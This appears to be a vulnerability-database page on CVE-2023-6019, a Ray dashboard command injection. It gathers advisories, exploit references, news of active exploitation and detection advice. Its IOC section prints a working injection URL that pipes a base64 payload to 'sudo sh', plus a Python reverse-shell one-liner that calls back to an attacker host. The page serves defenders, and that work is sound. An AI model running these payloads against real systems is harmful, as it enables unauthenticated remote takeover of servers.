CVE-2023-6019
published 2023-11-16CVE-2023-6019: A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely…
PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
74.63%
99.4th percentile
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anyscale | ray | >= 0 < 2.8.1 | 2.8.1 |
| ray-project | ray-project_ray | unspecified – latest | — |
Detection & IOCsextracted from sources · hover to see the quote
url/worker/cpu_profile?pid=3354&ip=<ip>&duration=5&native=0&format=`echo <b64_payload> |base64$IFS-d|sudo%20sh`↗
commandpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<lhost>,<lport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'↗
- →Monitor HTTP GET requests to the Ray Dashboard endpoint /worker/cpu_profile containing backtick characters or shell metacharacters (e.g., $IFS, base64, sudo) in the `format` query parameter, which indicates command injection exploitation. ↗
- →The exploit encodes the reverse shell payload in base64 and injects it via the `format` parameter using backtick command substitution and $IFS to bypass space filtering; detect base64-encoded strings in the `format` URL parameter of requests to /worker/cpu_profile. ↗
- →Detect unauthenticated GET requests to the Ray Dashboard (default port 8265) targeting /worker/cpu_profile — the endpoint requires no authentication and is directly exploitable remotely. ↗
- →Hunt for reverse shell patterns spawned from the Ray dashboard process, specifically python3 socket-based reverse shells using pty.spawn('/bin/bash'), as these are the payload delivered post-exploitation. ↗
- ·The Ray Dashboard binds to 0.0.0.0 by default, exposing it publicly if not restricted by firewall rules; Anyscale's own guidance recommends operating Ray within a strictly controlled network environment. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Ray OS Command Injection vulnerability
ghsa·2023-11-16
CVE-2023-6019 [CRITICAL] CWE-78 Ray OS Command Injection vulnerability
Ray OS Command Injection vulnerability
A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
GHSA
Ray Missing Authorization vulnerability
ghsa·2023-11-16
CVE-2023-6020 [CRITICAL] CWE-598 Ray Missing Authorization vulnerability
Ray Missing Authorization vulnerability
LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray OS Command Injection vulnerability
osv·2023-11-16
CVE-2023-6019 [CRITICAL] Ray OS Command Injection vulnerability
Ray OS Command Injection vulnerability
A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
GHSA
Ray Path Traversal vulnerability
ghsa·2023-11-16
CVE-2023-6021 [CRITICAL] CWE-22 Ray Path Traversal vulnerability
Ray Path Traversal vulnerability
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray Path Traversal vulnerability
osv·2023-11-16
CVE-2023-6021 [CRITICAL] Ray Path Traversal vulnerability
Ray Path Traversal vulnerability
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
OSV
Ray Missing Authorization vulnerability
osv·2023-11-16
CVE-2023-6020 [CRITICAL] Ray Missing Authorization vulnerability
Ray Missing Authorization vulnerability
LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
Red Hat
ray: Ray Dashboard Command Injection
vendor_redhat·2025-08-07·CVSS 9.8
CVE-2023-6019 [CRITICAL] CWE-78 ray: Ray Dashboard Command Injection
ray: Ray Dashboard Command Injection
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
A flaw was found in ray. The `cpu_profile` URL parameter allows for command injection, enabling a remote, unauthenticated attacker to execute arbitrary operating system commands on the system hosting the Ray dashboard. This exploitation occurs directly through a crafted URL. Successful command execution can lead to significant system compromise.
Statement: No Red Hat products
No detection rules found.
Exploit-DB
Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
exploitdb·2024-04-12·CVSS 9.8
CVE-2023-6019 [CRITICAL] Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
---
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://hu
Metasploit
Ray cpu_profile command injection
metasploit
Ray cpu_profile command injection
Ray cpu_profile command injection
Ray RCE via cpu_profile command injection vulnerability.
Bleepingcomputer
Hackers exploit Ray framework flaw to breach servers, hijack resources
blogs_bleepingcomputer·2024-03-26·CVSS 9.8
CVE-2023-6019 [CRITICAL] Hackers exploit Ray framework flaw to breach servers, hijack resources
## Hackers exploit Ray framework flaw to breach servers, hijack resources
## Bill Toulas
The framework boasts over 30,500 stars on GitHub , and it is used by many organizations worldwide, including Amazon, Spotify, LinkedIn, Instacart, Netflix, Uber, and OpenAI, that use it for training ChatGPT.
## Active exploitation underway
In November 2023, Anyscale disclosed five Ray vulnerabilities, fixing four tracked as CVE-2023-6019 , CVE-2023-6020 , CVE-2023-6021 , and CVE-2023-48023 .
However, the fifth bug, a critical remote code execution flaw tracked as CVE-2023-48022 , was not fixed because, according to them, its lack of authentication was a long-standing design decision.
"The remaining CVE (CVE-2023-48022) - that Ray does not have authentication built in - is a long-standing design d
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio
NoiseLetter October 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2023-11-16
Published